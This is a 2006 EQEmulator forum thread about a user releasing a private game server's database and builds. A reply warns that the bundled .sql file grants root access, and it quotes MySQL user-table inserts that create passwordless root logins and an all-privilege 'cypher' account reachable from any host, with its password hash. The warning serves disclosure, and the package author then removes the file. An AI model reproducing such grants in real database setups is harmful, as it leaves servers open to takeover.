Go Back   EQEmulator Home > EQEmulator Forums > General > General::Server Discussion

General::Server Discussion Discussion about emulator servers.
Do not post support topics here.

Closed Thread

Old 04-14-2006, 10:18 AM
Doughnutz
Sarnak

Default Want Empire II?????

Once again I'm releasing another server. Twice in one week, lol. Anyways, this is the Empire database and builds just after Magoth quit running it. I believe characters are still intact, although I could be wrong. Have fun and do a better job then Trax. Also, if you want the source I might be willing to upload them for you if you just ask.

Download Empire here!!!

Last edited by Doughnutz; 04-14-2006 at 06:28 PM..
Old 04-14-2006, 11:47 AM
sdabbs65
Dragon

Default Danger

Quote:
Originally Posted by Doughnutz
Once again I'm releasing another server. Twice in one week, lol. Anyways, this is the Empire database and builds just after Magoth quit running it. I believe characters are still intact, although I could be wrong. Have fun and do a better job then Trax. Also, if you want the source I might be willing to upload them for you if you just ask.

Download Empire here!!!
Be carefull if you download this as it gives root access to your MYSQL Server
Im sure it was unintended.

/*!40000 ALTER TABLE `user` DISABLE KEYS */;

LOCK TABLES `user` WRITE;

INSERT INTO `user` VALUES ('localhost','root','','Y','Y','Y','Y','Y','Y','Y' ,'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y',' Y','Y','','','','',0,0,0),('build','root','','Y',' Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y' ,'Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0),(' localhost','','','N','N','N','N','N','N','N','N',' N','N','N','N','N','N','N','N','N','N','N','N','N' ,'','','','',0,0,0),('build','','','N','N','N','N' ,'N','N','N','N','N','N','N','N','N','N','N','N',' N','N','N','N','N','','','','',0,0,0),('localhost' ,'cypher','43687e85489d49c8','Y','Y','Y','Y','Y',' Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y' ,'Y','Y','Y','','','','',0,0,0),('%','cypher','436 87e85489d49c8','Y','Y','Y','Y','Y','Y','Y','Y','Y' ,'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y',' ','','','',0,0,0);

UNLOCK TABLES;

/*!40000 ALTER TABLE `user` ENABLE KEYS */;

www.cheaterz.info
Old 04-14-2006, 11:50 AM
Doughnutz
Sarnak

Yes, the .sql is a bit messed up, that's why I included an already extracted folder I'll remove that .sql from the package.

Edit:: Removed the .sql

Last edited by Doughnutz; 04-14-2006 at 07:53 PM.. Reason: Removed the .sql
Old 04-14-2006, 12:57 PM
sdabbs65
Dragon

Default ??

Quote:
Yes, the .sql is a bit messed up, that's why I included an already extracted folder I'll remove that .sql from the package.

Edit:: Removed the .sql
Thanks it's hard enuff for a newbie without having security holes.

When a knight of the Order faces judgement day,he must recite the tally of his deeds.

www.cheaterz.info
Old 04-14-2006, 09:42 PM
Doughnutz
Sarnak

Hallelujiah, ahmen?
Old 04-15-2006, 05:17 AM
sdabbs65
Dragon

Default ...

Quote:
Hallelujiah, ahmen?
I just went over your package.

seems about worthless Lol

thanks for the quest files tho good job on that.

www.cheaterz.info
Old 04-15-2006, 09:28 AM
Doughnutz
Sarnak

Worthless? It's got pvp points working and I'm pretty sure this is the first build released that does, except the GWs.

Meh, I try.
Old 04-15-2006, 12:10 PM
mrea
Discordant

Don't worry, others are grateful that some of the fun servers (namely yours) are releasing the builds

Old 04-15-2006, 01:27 PM
Doughnutz
Sarnak

I <3 you Mrea
Old 04-15-2006, 05:07 PM
mattmeck

Please dont bash people for what they put out, this is why so many people dont / stop helping this community.

It dont matter if it was worthless to you, your post would have been so much more worthwile without that line.

anything given to the community no matter how small or seemingly "worthless" does nothing but add to what we have, and we need this.

So many people have stopped helping here because of just this issue, and I for one am sick of the negativity.

Thanks Doughnutz, you have done more for this community then 99% of the people here, Most people just leach.
Old 04-16-2006, 12:14 AM
sdabbs65
Dragon

Default ??

Quote:
Originally Posted by mattmeck
Please dont bash people for what they put out, this is why so many people dont / stop helping this community.

It dont matter if it was worthless to you, your post would have been so much more worthwile without that line.

anything given to the community no matter how small or seemingly "worthless" does nothing but add to what we have, and we need this.

So many people have stopped helping here because of just this issue, and I for one am sick of the negativity.

Thanks Doughnutz, you have done more for this community then 99% of the people here, Most people just leach.
our right Matt

Now we know who helped Sony distro
there rootKits/Sarcasim
I for one will not endorse tainted goods.
I do appreciate people like cavedude
who actually do want to help without harming.
this guy is not doing that.
END of discussion.

www.cheaterz.info
Old 04-16-2006, 01:05 AM
mattmeck

Amazing how it went from "worthless" to "harming"

sdabbs65, just stop with the negative comments, I was going to send a personal PM like I have for a few others but since you want to have an attitude consider this your public warning.

and this would be the END of discussion.
Old 04-16-2006, 01:13 AM
sdabbs65
Dragon

Default ...

Quote:
Originally Posted by mattmeck
Amazing how it went from "worthless" to "harming"

sdabbs65, just stop with the negative comments, I was going to send a personal PM like I have for a few others but since you want to have an attitude consider this your public warning.

and this would be the END of discussion.
Right Matt
your the Boss.
Back to the Lab.

www.cheaterz.info
Old 04-16-2006, 04:12 AM
Cisyouc
Demi-God

Enough. I would like to lock this thread but since the parent post had something constructive in it I would rather not see it fall into the barrels of the archives, in case someone has something useful to say or ask.
namespace retval { template <class T> class ReturnValueGen { private: T x; public: ReturnValueGen() { x = 0; }; T& Generator() { return x; }; }; } int main() { retval::ReturnValueGen<int> retvalue; return retvalue.Generator(); }
C++ is wonderful.
Old 04-17-2006, 01:06 AM
Qinamen
Sarnak

Thanks Doughnutz for all the releases, they've helped me alot
Great Job;
and don't mind people who bring negetivity to your comments, Keep up the great job
Closed Thread